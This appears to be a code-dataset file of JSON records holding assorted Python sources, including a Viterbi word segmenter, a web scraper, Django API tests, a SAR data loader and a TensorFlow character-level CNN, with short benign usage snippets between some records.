+{"seq_id":"546340328","text":"# -*- coding: utf-8 -*-\n\"\"\"Test suite module for prance.\"\"\"\n\n__author__ = 'Jens Finkhaeuser'\n__copyright__ = 'Copyright (c) 2016-2018 Jens Finkhaeuser'\n__license__ = 'MIT +no-false-attribs'\n__all__ = ()\n\ndef _find_imports(*args):\n  \"\"\"\n  Helper sorting the named modules into existing and not existing.\n  \"\"\"\n  import importlib\n  exists = {\n    True: [],\n    False: [],\n  }\n\n  for name in args:\n    try:\n      importlib.import_module(name)\n      exists[True].append(name)\n    except ImportError:\n      exists[False].append(name)\n\n  return exists\n\n\ndef none_of(*args):\n  \"\"\"\n  Return true if none of the named modules exist, false otherwise.\n  \"\"\"\n  exists = _find_imports(*args)\n  return len(exists[True]) == 0\n","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
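Inside this package's test tree, none_of() can gate tests whose optional dependencies are missing; expected behaviour on one real and one made-up module name:

from tests import none_of

print(none_of('json'))            # False: json is importable from the standard library
print(none_of('no_such_module'))  # True: the module does not exist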
+{"seq_id":"100822705","text":"import math\nimport sys\nfrom collections import defaultdict\n\n\n#inputfile='./model_file.word'\n#outputfile='segment_file'\n\n#f=open(inputfile,'r')\n#g=open(outputfile,'w')\n\nwith open(sys.argv[1],'r') as inputfile, open(sys.argv[2], 'r') as testfile:\n\n\tprobabilities = defaultdict(int)\n\n\tfor line in inputfile:\n\t\tline = line.split('\\t')\n\t\tprobabilities[line[0]] = float(line[1])\n\n########################\n\n\tlam=0.95\n\tlam_unk=1-lam\n\tV=1000000\n\tfor line in testfile:\n\t\tline=line.strip()\n\t\t#words=line.split(\" \")\n\t\t#words-utf=unicode(words,\"utf-8\")\n\t\t# Forward pass of the Viterbi search\n\t\tbest_edge={}\n\t\tbest_score={}\n\t\tbest_edge[0] = 'NULL'\n\t\tbest_score[0] = 0 \n\t\tfor word_end in range(1,len(line)+1): # +1 so the last character can end a word\n\t\t\tbest_score[word_end]=10000000000\n\t\t\tfor word_begin in range(0,word_end):\n\t\t\t\tword=line[word_begin:word_end]\n\t\t\t\tif word in probabilities or len(word)==1:\n\t\t\t\t\tprob=lam * probabilities[word] + lam_unk / V\n\t\t\t\t\tmy_score=best_score[word_begin]-math.log(prob,2)\n\t\t\t\t\tif my_score < best_score[word_end]:\n\t\t\t\t\t\tbest_score[word_end]=my_score\n\t\t\t\t\t\tbest_edge[word_end]=(word_begin,word_end)\n\t\t# Backward pass: follow the best edges back from the end of the line\n\t\twords=[]\n\t\tnext_edge=best_edge[len(line)]\n\t\twhile next_edge!='NULL':\n\t\t\tword=line[next_edge[0]:next_edge[1]]\n\t\t\tword.encode(encoding='utf-8')\n\t\t\twords.append(word)\n\t\t\tnext_edge=best_edge[next_edge[0]]\n\t\twords.reverse()\n\t\tprint(' '.join(words))\n\n\n\n\n\n","sub_path":"yuting/tutorial03/word-segment.py","file_name":"word-segment.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
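The candidate scores in the segmenter use linearly interpolated unigram probabilities, P(w) = lam * P_ML(w) + (1 - lam) / V, accumulated as negative log2 costs, so unknown single characters still get a nonzero probability. A standalone check of the formula with a made-up unigram probability:

import math

lam, V = 0.95, 1000000
p_ml = 0.02                       # made-up unigram probability of a known word
p = lam * p_ml + (1 - lam) / V    # interpolation keeps p > 0 even when p_ml == 0
print(round(-math.log(p, 2), 3))  # ~5.718, the cost the Viterbi search minimizes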
+{"seq_id":"48747460","text":"from bs4 import BeautifulSoup\nimport requests\nimport time\nimport json\n\n#from import playlist_url\n\ntime.sleep(1) ##For safety\n##Will need to learn how to get the url from the chrome interface. Problem for a later day\nplaylist_url = 'https://8tracks.com/nothyme1/please-study-you-re-failing' ##Random page I pulled for testing\nresponse = requests.get(playlist_url)\nsoup = BeautifulSoup(response.text, 'html.parser')\n\n##Need to store: The Song, The Artist -> For the actual spotify playlist\n ##Also need: The cover image, the notes, the maker of the playlist\n\ndisc = soup.find(\"meta\", {'property':'og:description'})['content'].replace('\\n','') ##Strip out breaks for use in spotify disc\nauthor = str(soup.find(\"meta\", {'property':'music:creator'})['content']).split('/')[-1]\ntitle = soup.find(\"meta\", {'property':'og:title'})['content']\ncover = soup.find(\"meta\", {'property':'og:image'})['content']\n\n##Store this info in a json\ndata = {\n    'Description': disc + \" A playlist by \" + author + \". Made using \",\n    'Title': title,\n    'Cover': cover\n}\nwith open(\"./store/meta.json\", 'w') as outfile:\n    json.dump(data, outfile)\n\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"139880898","text":"\n\nfrom xai.brain.wordbase.nouns._miniskirt import _MINISKIRT\n\n#class header\nclass _MINISKIRTS(_MINISKIRT, ):\n\tdef __init__(self,): \n\t\t_MINISKIRT.__init__(self)\n\t\tself.name = \"MINISKIRTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"miniskirt\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_miniskirts.py","file_name":"_miniskirts.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"348011839","text":"import dash_html_components as html\n\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nfrom textwrap import dedent\n\nfrom tutorial import tools\nfrom tutorial import styles\n\n\nexamples = {\n example: tools.load_example('tutorial/examples/table/{}'.format(example))\n for example in ['interactivity_connected_to_graph.py']\n}\n\nlayout = html.Div(\n [\n\n dcc.Markdown(\n dedent(\n \"\"\"\n # DataTable Interactivity\n\n `DataTable` includes several features for modifying and transforming the\n view of the data. These include:\n\n - Sorting by column (`sorting=True`)\n - Filtering by column (`filtering=True`)\n - Editing the cells (`editable=True`)\n - Deleting rows (`row_deletable=True`)\n - Deleting columns (`columns[i].deletable=True`)\n - Selecting rows (`row_selectable='single' | 'multi'`)\n\n A quick note on filtering. We have defined our own\n syntax for performing filtering operations. Here are some\n examples for this particular dataset:\n\n - Enter `eq \"Asia\"` in the \"continent\" column\n - Enter `> num(5000)` in the \"gdpPercap\" column\n - Enter `< num(80)` in the `lifeExp` column\n\n > Note that you need to wrap strings in double quotes (`\"`) and\n > numbers in `num`.\n > We will improve this syntax in the future,\n > follow [dash-table#169](https://github.com/plotly/dash-table/issues/169)\n > for more.\n\n \"\"\"\n )\n ),\n\n dcc.Markdown(dedent(\n \"\"\"\n By default, these transformations are done clientside.\n Your Dash callbacks can respond to these modifications\n by listening to the `data` property as an `Input`.\n\n Note that if `data` is an `Input` then the entire\n `data` will be passed over the network: if your dataframe is\n large, then this will become slow. For large dataframes, you can\n perform the [sorting or filtering in Python instead](/datatable/callbacks).\n \"\"\"\n )),\n\n dcc.SyntaxHighlighter(\n examples['interactivity_connected_to_graph.py'][0],\n language='python',\n customStyle=styles.code_container\n ),\n\n html.Div(\n examples['interactivity_connected_to_graph.py'][1],\n className='example-container'\n ),\n\n ]\n)\n","sub_path":"tutorial/table/interactivity_chapter.py","file_name":"interactivity_chapter.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
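A minimal sketch of the callback wiring the tutorial above describes, with invented component ids: a tiny table plus a div that re-renders whenever the client-side view of the data changes:

import dash
import dash_html_components as html
import dash_table
from dash.dependencies import Input, Output

app = dash.Dash(__name__)
app.layout = html.Div([
    dash_table.DataTable(
        id='datatable',
        columns=[{'name': 'x', 'id': 'x'}],
        data=[{'x': 1}, {'x': 2}],
        editable=True,
    ),
    html.Div(id='summary'),
])

@app.callback(Output('summary', 'children'), [Input('datatable', 'data')])
def summarize(rows):
    # `rows` is the table's current data as a list of dicts
    return 'rows: {}'.format(len(rows) if rows else 0)

if __name__ == '__main__':
    app.run_server(debug=True)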
+{"seq_id":"33253245","text":"#!/usr/bin/env python\nimport os, sys\nfrom setuptools import setup, find_packages\n\nif sys.argv[-1] == 'publish':\n os.system('python setup.py sdist upload')\n sys.exit(0)\n\nwith open('README.rst') as f:\n long_description = f.read()\n\n\nVERSION = __import__('dbgutils').get_version()\n\nsetup(\n name='django-dbgutils',\n version=VERSION,\n url='https://github.com/dakrauth/django-dbgutils',\n author='David A Krauth',\n author_email='dakrauth@gmail.com',\n description='Basic collection of extra debugging tools for Django.',\n long_description=long_description,\n platforms=['any'],\n license='MIT License',\n classifiers=(\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n ),\n packages=find_packages(),\n package_data={'dbgutils': ['templates/dbgutils/*']},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"158615426","text":"from django.urls import reverse\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.hashers import check_password\nfrom nose.tools import ok_, eq_\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom faker import Faker\nfrom ..models import User, UserProfile, Referral, Transaction, P2PTransfer\nfrom .factories import UserFactory\n\nfake = Faker()\n\n\nclass TestUserListTestCase(APITestCase):\n \"\"\"\n Tests /users list operations.\n \"\"\"\n\n def setUp(self):\n self.url = reverse('user-list')\n self.user_data = model_to_dict(UserFactory.build())\n\n def test_post_request_with_no_data_fails(self):\n response = self.client.post(self.url, {})\n eq_(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_post_request_with_valid_data_succeeds(self):\n response = self.client.post(self.url, self.user_data)\n eq_(response.status_code, status.HTTP_201_CREATED)\n\n user = User.objects.get(pk=response.data.get('id'))\n eq_(user.username, self.user_data.get('username'))\n ok_(check_password(self.user_data.get('password'), user.password))\n\n def test_post_request_with_valid_data_succeeds_and_profile_is_created(self):\n response = self.client.post(self.url, self.user_data)\n eq_(response.status_code, status.HTTP_201_CREATED)\n\n eq_(UserProfile.objects.filter(user__username=self.user_data['username']).exists(), True)\n\n def test_post_request_with_valid_data_succeeds_referral_is_created_if_code_is_valid(self):\n referring_user = UserFactory()\n self.user_data.update({\"referral_code\": referring_user.userprofile.referral_code})\n response = self.client.post(self.url, self.user_data)\n eq_(response.status_code, status.HTTP_201_CREATED)\n\n eq_(Referral.objects.filter(referred__username=self.user_data['username'],\n owner__username=referring_user.username).exists(), True)\n\n def test_post_request_with_valid_data_succeeds_referral_is_not_created_if_code_is_invalid(self):\n self.user_data.update({\"referral_code\": \"FAKECODE\"})\n response = self.client.post(self.url, self.user_data)\n eq_(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\nclass TestUserDetailTestCase(APITestCase):\n \"\"\"\n Tests /users detail operations.\n \"\"\"\n\n def setUp(self):\n self.user = UserFactory()\n self.url = reverse('user-detail', kwargs={'pk': self.user.pk})\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.user.auth_token}')\n\n def test_get_request_returns_a_given_user(self):\n response = self.client.get(self.url)\n eq_(response.status_code, status.HTTP_200_OK)\n\n def test_put_request_updates_a_user(self):\n new_first_name = fake.first_name()\n payload = {'first_name': new_first_name}\n response = self.client.put(self.url, payload)\n eq_(response.status_code, status.HTTP_200_OK)\n\n user = User.objects.get(pk=self.user.id)\n eq_(user.first_name, new_first_name)\n\n\nclass TestTransactions(APITestCase):\n \"\"\"\n Tests /users/:user_id/deposits operations.\n Tests /users/:user_id/withdrawals operations.\n Tests /account/ operations\n \"\"\"\n\n def setUp(self):\n self.user = UserFactory()\n self.user2 = UserFactory()\n\n self.transaction = Transaction.objects.create(\n owner=self.user, reference='deposit', amount=100, status='deposited'\n )\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.user.auth_token}')\n\n def test_user_can_make_a_deposit(self):\n payload = {'amount': 10.50}\n url = reverse('transaction-deposits', kwargs={'user_id': self.user.pk})\n response = self.client.post(url, payload)\n 
eq_(response.status_code, status.HTTP_200_OK)\n\n transaction = Transaction.objects.latest()\n eq_(transaction.amount, payload['amount'])\n eq_(transaction.status, 'deposited')\n\n def test_user_can_make_a_withdrawal(self):\n payload = {'amount': 10.50}\n url = reverse('transaction-withdrawals', kwargs={'user_id': self.user.pk})\n response = self.client.post(url, payload)\n eq_(response.status_code, status.HTTP_200_OK)\n\n transaction = Transaction.objects.latest()\n eq_(transaction.amount, -payload['amount'])\n eq_(transaction.status, 'withdrawn')\n\n def test_user_with_empty_balance_can_make_a_withdrawal(self):\n payload = {'amount': 10.50}\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.user2.auth_token}')\n\n url = reverse('transaction-withdrawals', kwargs={'user_id': self.user2.pk})\n response = self.client.post(url, payload)\n eq_(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_user_can_make_a_p2p_transfer(self):\n payload = {'amount': 10.50}\n url = reverse(\n 'account-p2p-transfer',\n kwargs={\n 'sender_account_id': self.user.pk,\n 'recipient_account_id': self.user2.pk\n }\n )\n response = self.client.post(url, payload)\n eq_(response.status_code, status.HTTP_200_OK)\n\n user_transaction = Transaction.objects.filter(owner=self.user).latest()\n user2_transaction = Transaction.objects.filter(owner=self.user2).latest()\n\n p2p_transfer = P2PTransfer.objects.latest()\n\n eq_(user_transaction.amount, -payload['amount'])\n eq_(user2_transaction.amount, payload['amount'])\n\n ok_(p2p_transfer.sender, self.user)\n ok_(p2p_transfer.recipient, self.user2)\n\n def test_user_can_fetch_all_transactions(self):\n url = reverse('transaction-fetch-all-transactions', kwargs={'account_id': self.user.pk})\n response = self.client.get(url)\n\n eq_(response.status_code, status.HTTP_200_OK)\n ok_(response.data['results'][0]['id'], self.transaction.id)\n\n def test_user_can_fetch_a_single_transaction(self):\n url = reverse(\n 'transaction-fetch-a-single-transaction',\n kwargs={'account_id': self.user.pk, 'transaction_id': self.transaction.pk}\n )\n response = self.client.get(url)\n\n eq_(response.status_code, status.HTTP_200_OK)\n ok_(response.data['id'], self.transaction.id)\n","sub_path":"flite/users/test/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":6307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"574477496","text":"# Write a Python program to flip a coin 1000 times and count heads and tails.\nimport random\nresults = {\n    '頭': 0,\n    '字': 0,\n}\nsides = list(results.keys())\nfor i in range(1000):\n    results[random.choice(sides)] += 1 # randomly pick heads ('頭') or tails ('字') and tally it in the results dict\nprint('頭:', results['頭'])\nprint('字:', results['字'])\n","sub_path":"Python課程/動手學Python (Python Hand-on Solve 200 Problems)/116.翻硬幣.py","file_name":"116.翻硬幣.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"563383089","text":"import sys, collections\nsys.stdin = open(\"테이프_input.txt\")\n# Need to use combinations.\n\ndef comb(n, r): # pick a combination of r out of the first n numbers\n    global my_min\n    if r == 0:\n        res = abs(sum(T) * 2 - sum(A))\n        if my_min > res:\n            my_min = res\n        # print(abs(sum(T) * 2 - sum(A)))\n        # print(T)\n    elif n < r:\n        return\n    else:\n        T[r-1] = A[n-1] # fill the next empty slot with A[n-1]\n        comb(n-1, r-1) # n-1, r-1\n        comb(n-1, r) # n-1, r\n# T = [0] * 2 # buffer holding the r chosen numbers\n# A = [1, 2, 3] # the n numbers\n# comb(3, 2)\n\nN = int(input())\nA = list(map(int, input().split()))\nT = [0] * int(N//2)\nmy_min = 99999999999999\ncomb(N, N//2)\nprint(my_min)\n\n\n\n\n","sub_path":"0331자습/테이프이어붙이기.py","file_name":"테이프이어붙이기.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
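The recursive comb() above enumerates every way to hand half of the numbers to one side; the same exhaustive search written with itertools.combinations may be easier to verify:

import itertools

def min_diff(A):
    total, best = sum(A), float('inf')
    # choose which len(A)//2 numbers form one side; the rest form the other
    for chosen in itertools.combinations(A, len(A) // 2):
        best = min(best, abs(2 * sum(chosen) - total))
    return best

print(min_diff([1, 2, 3]))  # 0: split {3} versus {1, 2}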
+{"seq_id":"547963828","text":"import torch\nimport scipy.io\nimport numpy as np\nimport random\nfrom torch.utils.data import random_split, TensorDataset, DataLoader\nfrom tqdm import tqdm\n\ndef normalize(data):\n maxValue = np.max(data)\n minValue = np.min(data)\n data = (data - minValue) / (maxValue - minValue)\n return data\n\ndef mat_data(args):\n data_load = scipy.io.loadmat(args.data_folder + str(args.que_data_name) + '.mat')\n key = list(data_load.keys())\n # print(key)\n # input()\n # 特征导入\n stack = data_load['feature'].astype(float) # (1500,1000,3)\n print(stack.shape)\n stack = np.pad(stack, ((8,8),(8,8),(0,0)), 'edge')\n print(stack.shape)\n print(\"stack: \", stack.dtype)\n return stack\n\n\ndef reshape_rectangle_data(stack, size_1, size_2, size_3):\n h_patches = np.arange(size_3//2, stack.shape[0]-(size_3//2))\n h_size = len(h_patches)\n v_patches = np.arange(size_3//2, stack.shape[1]-(size_3//2))\n v_size = len(v_patches)\n\n stacks_1 = np.zeros((h_size * v_size, stack.shape[2], size_1 , size_1))\n stacks_2 = np.zeros((h_size * v_size, stack.shape[2], size_2 , size_2))\n stacks_3 = np.zeros((h_size * v_size, stack.shape[2], size_3 , size_3))\n\n i = 0\n for h in tqdm(h_patches):\n for v in v_patches:\n for layer in range (stack.shape[2]):\n stacks_1[i][layer] = stack[(h-size_1//2):(h+size_1//2+1), (v-size_1//2):(v+size_1//2+1), layer]\n stacks_2[i][layer] = stack[(h-size_2//2):(h+size_2//2+1), (v-size_2//2):(v+size_2//2+1), layer]\n stacks_3[i][layer] = stack[(h-size_3//2):(h+size_3//2+1), (v-size_3//2):(v+size_3//2+1), layer]\n i += 1\n '''\n print(f\"stacks_1: {stacks_1.shape}\") # (739872,27,5,5)\n print(f\"stacks_2: {stacks_2.shape}\") # (739872,27,11,11)\n print(f\"stacks_3: {stacks_3.shape}\") # (739872,27,17,17)\n print(f\"gts: {gts.shape}\") # (750360)\n '''\n return stacks_1, stacks_2, stacks_3\n\ndef sar_datesets(args):\n stack= mat_data(args)\n stack = normalize(stack) # 特征归一化\n stacks_1, stacks_2, stacks_3 = reshape_rectangle_data(stack, args.sar_size1, args.sar_size2, args.sar_size3)\n print(f\"Resizing image of size {stack.shape} to image patches {stacks_1.shape}, {stacks_2.shape} and {stacks_3.shape}\")\n input(\"save:\")\n np.save('./data/' + args.que_data_name + '/stacks_1.npy', stacks_1)\n np.save('./data/' + args.que_data_name + '/stacks_2.npy', stacks_2)\n np.save('./data/' + args.que_data_name + '/stacks_3.npy', stacks_3)\n \n return 1\n\ndef sar_dataloader(args, gts_class, gts, stacks_1, stacks_2, stacks_3, split='train', form='support', shuffle=True):\n # init parameters\n if split == 'train':\n if form == 'support':\n n_shot = args.train_n_shot\n elif form == 'query':\n n_shot = args.train_n_query\n else:\n print(\"form error\")\n elif split == 'test':\n if form == 'support':\n n_shot = args.test_n_shot\n elif form == 'query':\n n_shot = args.test_n_query\n else:\n print(\"form error\")\n else:\n print(\"split error\")\n stack_index = np.arange(0, gts.size(0)) # 生成stack的索引\n index = np.zeros((1, 2), dtype=int) # 生成一个零数组,方便for循环\n class_num = np.zeros(args.test_n_way).astype(int)\n j = 0\n for i in gts_class:\n stack_index_i = stack_index[gts == i]\n gts_index_i = np.ones(n_shot, dtype=int)*j\n gts_index_i = gts_index_i[:, np.newaxis] # 增加维度\n class_num[i] = len(stack_index_i)\n # print(i, \":\", len(stack_index_i))\n stack_index_i = np.random.choice(stack_index_i, n_shot, False)\n # print(\"stack_index_i: \", stack_index_i)\n stack_index_i = stack_index_i[:, np.newaxis]\n index_i = np.concatenate((stack_index_i, gts_index_i), axis=1)\n index = 
np.concatenate((index, index_i), axis=0)\n j += 1\n \n if shuffle :\n index = np.random.permutation(np.delete(index, 0 , 0)) # 去除第一个值并打乱顺序\n else:\n index = np.delete(index, 0 , 0) # 不打乱顺序\n # print(\"index: \", index)\n # print(\"gts: \", gts[133829], gts[181901], gts[21650], gts[51858])\n epoch_stacks_1 = []\n epoch_stacks_2 = []\n epoch_stacks_3 = []\n epoch_gts = torch.from_numpy(index[:,1])\n for item in list(index[:,0]):\n epoch_stacks_1.append(stacks_1[item].unsqueeze(0)) # 每一行需要增加一维,拼接时保证维度正确\n epoch_stacks_2.append(stacks_2[item].unsqueeze(0))\n epoch_stacks_3.append(stacks_3[item].unsqueeze(0))\n epoch_stacks_1 = torch.cat(epoch_stacks_1, dim=0) # (25,27,5,5)\n epoch_stacks_2 = torch.cat(epoch_stacks_2, dim=0)\n epoch_stacks_3 = torch.cat(epoch_stacks_3, dim=0)\n return epoch_stacks_1, epoch_stacks_2, epoch_stacks_3, epoch_gts, class_num\n","sub_path":"optical/all_sar_data.py","file_name":"all_sar_data.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"385596905","text":"#!/usr/bin/python\nfrom transaction.base_task import *\nfrom service.message_define import *\nfrom test_result_enum import *\n\nclass ModifyDeviceTask(BaseTask):\n operate_timeout = 20\n def __init__(self, task_type, messsage_handler,\n case_manager,logger_name):\n self.case_manager = case_manager\n #logger_name = \"task.modify_device\"\n BaseTask.__init__(self, task_type, RequestDefine.modify_device,\n messsage_handler, logger_name)\n \n self.addTransferRule(state_initial, AppMessage.RESPONSE,\n RequestDefine.modify_device, result_success,\n self.onModifySuccess)\n self.addTransferRule(state_initial, AppMessage.RESPONSE,\n RequestDefine.modify_device, result_fail,\n self.onModifyFail)\n self.addTransferRule(state_initial, AppMessage.EVENT,\n EventDefine.timeout, result_any,\n self.onModifyTimeout) \n \n\n def invokeSession(self, session):\n \"\"\"\n task start, must override\n \"\"\"\n request = getRequest(RequestDefine.modify_device)\n param = self.case_manager.getParam()\n control_server = param[\"control_server\"] \n \n ##build from image\n device_name = param[\"device_name\"]\n uuid = param[\"device\"]\n disk_type = int(param[\"disk_type\"])\n authen_user = param[\"authen_user\"]\n authen_pwd = param[\"authen_pwd\"]\n ss_uuid = param[\"ss_uuid\"] \n authen = param[\"authen\"]\n crypt_trans = param[\"crypt_trans\"]\n cmp_trans = param[\"cmp_trans\"]\n\n option = []\n if authen:\n option.append(1)\n else:\n option.append(0)\n\n if crypt_trans:\n option.append(1)\n else:\n option.append(0)\n\n if cmp_trans:\n option.append(1)\n else:\n option.append(0) \n \n request.setString(ParamKeyDefine.name,device_name)\n request.setString(ParamKeyDefine.uuid, uuid)\n request.setUIntArray(ParamKeyDefine.option, option)\n request.setUInt(ParamKeyDefine.disk_type, disk_type)\n request.setString(ParamKeyDefine.user, authen_user)\n request.setString(ParamKeyDefine.authentication, authen_pwd)\n request.setString(ParamKeyDefine.snapshot,ss_uuid)\n \n self.info(\"[%08X]request modify device '%s' to control server '%s'\"%\n (session.session_id, device_name, control_server))\n session.target = device_name\n request.session = session.session_id\n self.setTimer(session, self.operate_timeout)\n self.sendMessage(request, control_server)\n\n def onModifySuccess(self, msg, session):\n self.clearTimer(session)\n self.info(\"[%08X]modify host success\"%\n (session.session_id))\n self.case_manager.finishTestCase(TestResultEnum.success) \n session.finish()\n\n def onModifyFail(self, msg, session):\n self.clearTimer(session)\n self.info(\"[%08X]modify device fail\"%\n (session.session_id))\n \n self.case_manager.finishTestCase(TestResultEnum.fail)\n session.finish()\n \n def onModifyTimeout(self, msg, session):\n self.info(\"[%08X]modify device timeout\"%\n (session.session_id))\n self.case_manager.finishTestCase(TestResultEnum.timeout)\n session.finish()\n\n","sub_path":"zctool_v1.25_共享存储/task/modify_device.py","file_name":"modify_device.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"359409524","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAn implementation of\n\n Character-level Convolutional Networks for Text Classification\n Zhang and LeCun, 2015 (See https://arxiv.org/abs/1509.01626)\n\n\"\"\"\n\nimport numpy as np\nimport json\n\nimport tensorflow as tf\n\nfrom charcnn import data\n\n\ndef char_cnn(features, n_vocab, n_classes, with_dropout=True):\n \"\"\"\n Char-CNN, see Zhang and LeCun, 2015.\n \"\"\"\n\n # reserve for special control characters – eg unknown, padding\n n_vocab = n_vocab + data.N_VOCAB_RESERVED\n\n if with_dropout:\n dropout_probability = 0.5\n else:\n dropout_probability = 0.0\n\n def conv(inputs, filters, kernel_size):\n activation_layer = tf.layers.Conv1D(filters=filters,\n kernel_size=kernel_size,\n padding='same',\n activation=tf.nn.relu,\n dtype=inputs.dtype.base_dtype)\n\n activation = activation_layer(inputs)\n\n tf.summary.histogram('activations', activation)\n tf.summary.histogram('kernel', activation_layer.kernel)\n tf.summary.histogram('bias', activation_layer.bias)\n\n tf.summary.scalar('activation_non_zeros', tf.count_nonzero(activation_layer.bias))\n tf.summary.scalar('kernel_non_zeros', tf.count_nonzero(activation_layer.bias))\n tf.summary.scalar('bias_non_zeros', tf.count_nonzero(activation_layer.bias))\n\n return activation\n\n def pool(activation, pool_size):\n mp = tf.layers.max_pooling1d(inputs=activation,\n pool_size=pool_size,\n strides=pool_size)\n\n return mp\n\n def dense(features, units, with_dropout=True):\n d = tf.layers.dense(inputs=features, units=units)\n if with_dropout:\n d = tf.layers.dropout(d, dropout_probability)\n\n return d\n\n # char-cnn\n #\n with tf.name_scope('block-1'):\n c1 = conv(features['chars'], filters=256, kernel_size=7)\n c1 = pool(c1, pool_size=3)\n\n with tf.name_scope('block-2'):\n c2 = conv(c1, filters=256, kernel_size=7)\n c2 = pool(c2, pool_size=3)\n\n with tf.name_scope('block-3'):\n c3 = conv(c2, filters=256, kernel_size=3)\n c4 = conv(c3, filters=256, kernel_size=3)\n c5 = conv(c4, filters=256, kernel_size=3)\n c6 = conv(c5, filters=256, kernel_size=3)\n c6 = pool(c6, pool_size=3)\n\n with tf.name_scope('dense'):\n f1 = tf.layers.flatten(inputs=c6)\n d1 = dense(f1, units=1024)\n d2 = dense(d1, units=1024)\n logits = dense(d2, units=n_classes, with_dropout=False)\n\n return logits\n\n\ndef model_fn(features, labels, mode, params):\n \"\"\"\n Estimator model function for prediction, training and evaluation.\n \"\"\"\n\n def probability_ops(logits):\n probabilities = tf.nn.softmax(logits, name='classes')\n return probabilities, tf.argmax(probabilities, axis=1)\n\n def loss_op(labels, logits):\n return tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=logits)\n\n # prediction\n logits = char_cnn(features, len(params['vocab']), len(params['classes']))\n\n # predict\n if mode == tf.estimator.ModeKeys.PREDICT:\n probabilities, predicted_indices = probability_ops(logits)\n\n predictions = {\n 'prediction_index': predicted_indices,\n 'prediction': tf.gather(params['classes'], predicted_indices),\n 'probabilities': probabilities\n }\n\n # add ground truth to the output if it's there\n if 'ground_truth' in features:\n predictions['ground_truth'] = features['ground_truth']\n\n return tf.estimator.EstimatorSpec(\n mode,\n predictions=predictions,\n export_outputs={\n 'predictions': tf.estimator.export.PredictOutput(predictions)\n })\n\n # train\n if mode == tf.estimator.ModeKeys.TRAIN:\n global_step = tf.train.get_or_create_global_step()\n loss = 
loss_op(labels, logits)\n optimizer = tf.train.AdamOptimizer()\n\n # get hold of the gradients in order to summarize them\n gradients = optimizer.compute_gradients(loss)\n train_op = optimizer.apply_gradients(gradients, global_step=global_step)\n\n # metrics\n tf.summary.scalar('cross_entropy', loss)\n\n for pair in gradients:\n gradient, variable = pair\n summary_name = ('%s_gradient' % variable.name).replace(':', '_')\n tf.summary.histogram(summary_name, gradient)\n\n return tf.estimator.EstimatorSpec(\n mode,\n loss=loss,\n train_op=train_op)\n\n # evaluate\n if mode == tf.estimator.ModeKeys.EVAL:\n probabilities, predicted_indices = probability_ops(logits)\n label_indices = tf.argmax(input=labels, axis=1)\n loss = loss_op(labels, logits)\n\n return tf.estimator.EstimatorSpec(\n mode,\n loss=loss,\n eval_metric_ops={\n 'accuracy': tf.metrics.accuracy(label_indices, predicted_indices),\n 'auroc': tf.metrics.auc(labels, probabilities)\n })\n","sub_path":"charcnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
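The model_fn above follows the tf.estimator contract (TensorFlow 1.x); a sketch of how it might be wired up, where the model directory, vocab/classes, and the input function are all placeholders rather than values from the original project:

import tensorflow as tf

estimator = tf.estimator.Estimator(
    model_fn=model_fn,           # the function defined above
    model_dir='/tmp/charcnn',    # placeholder checkpoint directory
    params={'vocab': list('abcdefghijklmnopqrstuvwxyz'), 'classes': ['pos', 'neg']},
)
# train_input_fn (not shown) must yield ({'chars': batch}, one_hot_labels) pairs:
# estimator.train(input_fn=train_input_fn, steps=1000)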
